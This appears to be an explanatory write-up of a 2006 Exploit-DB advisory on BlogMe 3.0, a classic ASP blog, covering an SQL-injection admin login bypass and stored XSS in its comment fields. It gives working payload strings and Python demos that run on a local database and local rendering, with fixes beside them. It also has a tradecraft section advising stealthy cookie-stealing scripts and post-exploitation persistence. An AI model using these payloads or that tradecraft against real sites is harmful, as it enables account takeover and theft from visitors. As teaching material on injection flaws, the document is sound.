BlogMe 3.0 Authentication Bypass and XSS Explained

What this paper is
This paper details two vulnerabilities found in BlogMe version 3.0, a classic ASP blogging application (vendor site: http://www.drumster.net/).
- Authentication Bypass: An attacker can gain administrative access without knowing valid credentials.
- Cross-Site Scripting (XSS): An attacker can inject malicious scripts into the web application, which can then be executed by other users.
The paper was published on November 14, 2006, on milw0rm by Laurent Gaffié and Benjamin Mossé of Security Access Point (s-a-p.ca), and is archived as Exploit-DB paper 2781.
Simple technical breakdown
BlogMe 3.0 is a classic ASP application: form fields are read on the server, and, as the payloads show, at least the login fields are concatenated straight into an SQL statement.
- Authentication Bypass: The login form's username and password appear to be built into the SQL query without quoting or escaping, so the "login bypass" in the advisory is SQL injection. By supplying an always-true condition, an attacker turns the WHERE clause into one that matches every row; the application sees that a row came back, accepts the login, and, because the first row in a typical user table is the administrator, grants admin access without any valid credentials.
- XSS: The comment form on /comments.asp stores the Name, URL and Comments fields and later writes them back into the page without HTML encoding. An attacker can therefore embed HTML and JavaScript in a comment, and every visitor who views that entry executes the script in their own browser. This is stored (persistent) XSS, with the usual consequences: session cookie theft, defacement, redirection, or actions performed with the victim's privileges, including the administrator's if an admin reads the comments.
Complete code and payload walkthrough
The provided paper does not contain executable code or shellcode. It describes the vulnerabilities and provides the specific input strings used to exploit them.
Here's a breakdown of the exploit strings and their purpose:
Authentication Bypass Exploit Strings:
user : ' or '1' = '1
passwd: 1'='1' ro '
Mapping:
- ' or '1' = '1 (Username field): A classic SQL injection payload. Assume the login query is built by string concatenation, roughly SELECT * FROM users WHERE username = 'USER_INPUT' AND password = 'PASSWORD_INPUT'. The leading ' closes the username literal, or '1' = '1 appends a condition that is always true, and the application's own closing quote terminates the final '1 literal. Note the operator precedence: AND binds more tightly than OR, so this payload on its own yields WHERE username = '' OR ('1' = '1' AND password = '...'), which is still false unless the password matches. The bypass therefore depends on either injecting the password field as well, or on application logic that looks the user up by username first and checks the password separately (both patterns were common in 2006-era ASP code; the paper does not show which applies). Once the condition is true for every row, the query returns the whole user table, and "a row came back, so log the visitor in as that row" logic signs the attacker in as the first record, which in a fresh installation is usually the administrator account.
- 1'='1' ro ' (Password field): Read character by character, this string is the username payload written backwards (apart from the spaces around =), so it is most likely a transcription artifact rather than a deliberate second payload. Taken literally it does not work: substituted into the query it yields password = '1'='1' ro '', and ro is not a keyword in any common SQL dialect, so the statement fails to parse and the login fails closed. The intended payload is almost certainly the same ' or '1' = '1 in both fields. With that in both fields the WHERE clause becomes username = '' OR '1' = '1' AND password = '' OR '1' = '1', which is true for every row regardless of precedence. When reproducing, use the same payload in both fields rather than the string as printed.
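To make the mapping above concrete, here is an added example in Python that is not the paper's code and not BlogMe's ASP source (which the paper does not include). It reproduces the login logic against an in-memory SQLite table: the table layout, the sample accounts, the query shape and the "first row returned wins" rule are assumptions standing in for the unknown BlogMe code, while the two payload strings are copied from the advisory. It runs the username payload alone, the password string exactly as printed, the same payload in both fields, and finally the parameterized query that prevents all of them.

```python
# Added example, not from the advisory or from BlogMe: a minimal reproduction of the
# authentication-bypass logic using an in-memory SQLite database. The table layout,
# the sample accounts and the query shape are assumptions; the paper shows no ASP source.
import sqlite3

PAYLOAD = "' or '1' = '1"            # username string from the advisory
PAYLOAD_PW_AS_PRINTED = "1'='1' ro '"  # password string exactly as printed


def make_db() -> sqlite3.Connection:
    """Constructed sample user table; the first row is the administrator."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, is_admin INTEGER)"
    )
    con.executemany(
        "INSERT INTO users (username, password, is_admin) VALUES (?, ?, ?)",
        [("admin", "s3cret", 1), ("bob", "hunter2", 0)],
    )
    return con


def build_vulnerable_query(user: str, pw: str) -> str:
    """2006-style string concatenation, the pattern we assume BlogMe used."""
    return ("SELECT username, is_admin FROM users WHERE username = '"
            + user + "' AND password = '" + pw + "'")


def login_vulnerable(con: sqlite3.Connection, user: str, pw: str):
    """Return the first matching row or None; 'a row came back' means logged in."""
    try:
        return con.execute(build_vulnerable_query(user, pw)).fetchone()
    except sqlite3.OperationalError:
        return None  # malformed SQL raises an error; the login fails closed


def login_parameterized(con: sqlite3.Connection, user: str, pw: str):
    """Same query with bound parameters: input can never change the SQL structure."""
    return con.execute(
        "SELECT username, is_admin FROM users WHERE username = ? AND password = ?",
        (user, pw),
    ).fetchone()


def is_reversed_payload(pw: str, user: str) -> bool:
    """Whitespace-insensitive check that pw is user written backwards."""
    def squash(s: str) -> str:
        return s.replace(" ", "")
    return squash(pw) == squash(user)[::-1]


if __name__ == "__main__":
    con = make_db()
    # 1. Username payload alone: AND binds tighter than OR, so the password still matters.
    print(login_vulnerable(con, PAYLOAD, "wrong"))
    # 2. Password string exactly as printed: 'ro' is not SQL, the statement fails to parse.
    print(build_vulnerable_query(PAYLOAD, PAYLOAD_PW_AS_PRINTED))
    print(login_vulnerable(con, PAYLOAD, PAYLOAD_PW_AS_PRINTED))
    # 3. Same always-true payload in both fields: every row matches, first row is admin.
    print(login_vulnerable(con, PAYLOAD, PAYLOAD))
    # 4. Parameterized: the payload is just a literal string that matches no user.
    print(login_parameterized(con, PAYLOAD, PAYLOAD))
    print(is_reversed_payload(PAYLOAD_PW_AS_PRINTED, PAYLOAD))
```

Cases 1 and 2 return None, case 3 returns the admin row, and the parameterized query returns None for the payload and the admin row only for the real credentials. Whether case 1 also fails on the real BlogMe depends on how its login code is structured, which the paper does not show.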
XSS Exploit Strings:
The paper indicates that the following fields are vulnerable to XSS when submitting comments via /comments.asp?blog=85 (blog=85 is presumably just the identifier of the entry the authors commented on):
- Name
- URL
- Comments
Mapping:
- Vulnerable fields (Name, URL, Comments): The paper states that input provided in these fields is not properly sanitized before being displayed back to users, so an attacker can submit HTML or JavaScript. For example, in the Comments field an attacker could submit:
<script>alert('XSSed!');</script>
When this comment is displayed on the page, the browser of any user viewing it executes the JavaScript and shows an alert box. Because the comment is stored and re-rendered to every visitor, this is stored (persistent) XSS, which is what the advisory's "xss (post)" label refers to. More malicious scripts could steal cookies, redirect users, or perform other actions in the victim's session.
Note: The paper does not provide the actual ASP code for BlogMe 3.0, nor does it provide specific shellcode or payloads beyond the exploit strings themselves. The explanation above is based on common SQL injection and XSS techniques prevalent in 2006 and the provided input patterns.
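The following is an added Python example, not BlogMe code and not from the paper, showing how the three comment fields reach the page when rendered the unsafe way described above and the encoded way that prevents it. The HTML template, the constructed attacker submission, and the assumption that URL is written into an href attribute are ours; the advisory lists only the field names. The example also covers the "context of injection" point: HTML-encoding alone does not neutralise a javascript: URL in an href, so the URL field additionally needs a scheme allowlist.

```python
# Added example, not from the advisory or from BlogMe: rendering the Name, URL and
# Comments fields into HTML the vulnerable way (raw interpolation) and the encoded way.
# The template and the attacker submission are constructed; the advisory gives only
# the field names, and the assumption that URL becomes an href is ours.
import html
from urllib.parse import urlsplit

# Constructed attacker submission to /comments.asp?blog=85
ATTACK = {
    "Name": "<script>alert('XSSed!');</script>",   # the advisory-style payload
    "URL": "javascript:alert(document.cookie)",    # attribute-context payload
    "Comments": "<img src=x onerror=alert(1)>",    # tag that needs no <script>
}

TEMPLATE = '<div class="comment"><a href="%s">%s</a><p>%s</p></div>'


def render_vulnerable(c: dict) -> str:
    """Straight interpolation, the pattern the paper describes: markup survives."""
    return TEMPLATE % (c["URL"], c["Name"], c["Comments"])


def safe_url(u: str) -> str:
    """Attribute encoding does not defuse a javascript: link; allowlist the scheme."""
    scheme = urlsplit(u.strip()).scheme.lower()
    return u if scheme in ("http", "https") else "#"


def render_encoded(c: dict) -> str:
    """Encode each field for the context it lands in: href attribute vs body text."""
    return TEMPLATE % (
        html.escape(safe_url(c["URL"]), quote=True),  # attribute context
        html.escape(c["Name"]),                        # HTML body text
        html.escape(c["Comments"]),                    # HTML body text
    )


def contains_active_markup(rendered: str) -> bool:
    """Crude check: a live tag or a javascript: href made it into the output."""
    lowered = rendered.lower()
    return ("<script" in lowered or "<img" in lowered
            or 'href="javascript:' in lowered)


if __name__ == "__main__":
    print(render_vulnerable(ATTACK))
    print(contains_active_markup(render_vulnerable(ATTACK)))   # True
    print(render_encoded(ATTACK))
    print(contains_active_markup(render_encoded(ATTACK)))      # False
```

The vulnerable renderer emits the attacker's tags verbatim, so the browser executes them; the encoded renderer turns < into &lt; in body text, quotes the attribute, and replaces the javascript: link with a harmless #. Escaping the href without the scheme check would still leave a clickable javascript: URL, which is why the URL field is the one most likely to need a payload other than a script tag.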
Practical details for offensive operations teams
Required Access Level:
- Authentication Bypass: Network access to the BlogMe 3.0 web application. No prior authentication is required.
- XSS: Network access to the BlogMe 3.0 web application. The attacker needs to be able to submit comments.
Lab Preconditions:
- A vulnerable instance of BlogMe 3.0 must be deployed and accessible. Given the age of the vulnerability, this means a legacy environment: IIS with classic ASP enabled (Windows Server 2003 with IIS 6.0 is period-appropriate) plus whatever database the product shipped with; the paper names neither the database nor the exact IIS version.
- A web browser. The login and comment forms are ordinary HTML forms, so no special tooling is needed to send the POST requests.
- For XSS, a target user who will view the injected content.
Tooling Assumptions:
- Authentication Bypass:
- A web browser (e.g., Internet Explorer, Firefox): the payloads are simply typed into the username and password fields of the login form; no hand-crafted request is needed.
- A web proxy like Burp Suite or OWASP ZAP to intercept and modify login requests.
- XSS:
- A web browser.
- A web proxy to intercept and modify comment submission requests.
- Potentially, a tool to automate the submission of XSS payloads across multiple comment fields if the application allows it.
Execution Pitfalls:
- Authentication Bypass:
- Input Encoding/Sanitization: Any build that quotes or escapes the login fields, or that uses parameterized queries, defeats these payloads. The paper does not reference a fixed version, so test rather than assume.
- Database Specifics: The paper does not identify the backend database. The payload uses only single-quoted string literals and OR, which parse the same way in Access/Jet, SQL Server and MySQL, so it is dialect-neutral; what differs between backends is comment syntax, error messages, and how a malformed statement is reported to the page.
- Application Logic: The application might have additional checks beyond the username/password fields that could prevent bypass.
- XSS:
- Output Encoding/Sanitization: The most common defense against XSS is output encoding. If BlogMe 3.0 HTML-encodes the stored fields when writing them back (e.g., < becomes &lt;), the script is displayed as text, not executed.
- Browser XSS Filters: Internet Explorer's XSS Filter and Chrome's XSS Auditor were heuristics for reflected XSS; both have since been removed, and Firefox never shipped one. They were never intended to catch stored XSS such as this comment injection, so do not rely on them in either direction.
- Content Security Policy (CSP): If the web server or application sets a Content-Security-Policy header, it can restrict which scripts are allowed to run and blunt the impact. A 2006-era ASP application will not set one unless the web server or a reverse proxy has been configured to add it.
- Context of Injection: The effectiveness of XSS depends on where the input is displayed. The paper does not say where each field is rendered. Name and Comments most likely land in HTML body text, where a <script> tag works; URL is most likely written into an href attribute, where the working payload is a javascript: URL rather than a tag, and where HTML-encoding alone is not a sufficient fix.
Tradecraft Considerations:
- Reconnaissance: Confirm the exact version of BlogMe being used.
- Payload Crafting: For XSS, test various payloads to bypass filters and achieve desired effects (e.g., cookie theft, redirection).
- Stealth: When performing XSS, consider the impact on other users. Ensure the injected script is as unobtrusive as possible if the goal is stealthy data exfiltration.
- Post-Exploitation: For authentication bypass, once admin access is gained, immediately look for ways to persist access or exfiltrate data.
Where this was used and when
- Context: This vulnerability was relevant to any organization or individual using BlogMe version 3.0 for their blogging platform.
- Timeframe: The paper was published in November 2006. Therefore, this vulnerability was actively exploitable around this period. It's highly unlikely to be effective against any modern, patched, or updated web application.
Defensive lessons for modern teams
- Input Validation and Sanitization: Always validate and sanitize all user-supplied input on both the client-side (for user experience) and, critically, on the server-side before processing or storing it.
- Parameterized Queries/Prepared Statements: For database interactions, use parameterized queries or prepared statements to prevent SQL injection. Never concatenate user input directly into SQL queries.
- Output Encoding: Always encode output appropriately for the context in which it is displayed (e.g., HTML entity encoding for HTML content, JavaScript encoding for JavaScript contexts).
- Least Privilege: Ensure that the database account the web application connects with has only the privileges the pages need (for a login check, read access to the user table), so that an injection cannot read, alter, or drop tables beyond that scope.
- Regular Patching and Updates: Keep all software, including web applications and their underlying frameworks, up to date with the latest security patches.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common web attacks like SQL injection and XSS, as defense in depth rather than a substitute for fixing the code; signature-based rules are routinely bypassed with encoding and syntax variants.
- Security Audits and Code Reviews: Regularly conduct security audits and code reviews to identify vulnerabilities before they can be exploited.
ASCII visual (if applicable)
This paper describes web application vulnerabilities, not network protocols or complex architectures, so a network-flow diagram is less applicable. The data flow for each vulnerability can still be visualized:

1. Authentication Bypass (SQL Injection):

+-----------------+      +-----------------+   (unsanitized     +-----------------+
| Attacker's Input| ---> | Web Application |    query) -------> | Database Server |
| (Malicious SQL) |      | (BlogMe 3.0)    | <------ (row(s)    | (User Table)    |
+-----------------+      +--------+--------+    returned)       +-----------------+
                                  |
                                  | (row returned => "authentication success")
                                  v
                         +-----------------+      +-----------------+
                         | Login Logic     | ---> | Admin Session   |
                         +-----------------+      +-----------------+

2. Cross-Site Scripting (XSS):

+-----------------+      +-----------------+      +-----------------+
| Attacker's Input| ---> | Web Application | ---> | Database Server |
| (Malicious JS)  |      | (BlogMe 3.0)    |      | (Comments Table)|
+-----------------+      +-----------------+      +--------+--------+
                                                           |
                                                           | (stored payload read
                                                           |  back on every view)
                        (unencoded output)                 v
+-----------------+      +-----------------+      +-----------------+
| Victim's Browser| <--- | Web Application | <--- | Database Server |
| (JS Executes)   |      | (BlogMe 3.0)    |      | (Comments Table)|
+-----------------+      +-----------------+      +-----------------+

Source references
- PAPER ID: 2781
- PAPER TITLE: blogme 3.0 - Cross-Site Scripting / Authentication Bypass
- AUTHOR: Security Access Point
- PUBLISHED: 2006-11-14
- KEYWORDS: ASP,webapps
- PAPER URL: https://www.exploit-db.com/papers/2781
- RAW URL: https://www.exploit-db.com/raw/2781
Original Exploit-DB Content (Verbatim)
blogme v3 [admin login bypass & xss (post)]
vendor site:http://www.drumster.net/
product:blogme v3
bug:login bypass & xss (post)
risk:high
admin login bypass :
user : ' or '1' = '1
passwd: 1'='1' ro '
xss post :
in: /comments.asp?blog=85
vulnerables fields:
- Name
- URL
- Comments
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com
# milw0rm.com [2006-11-14]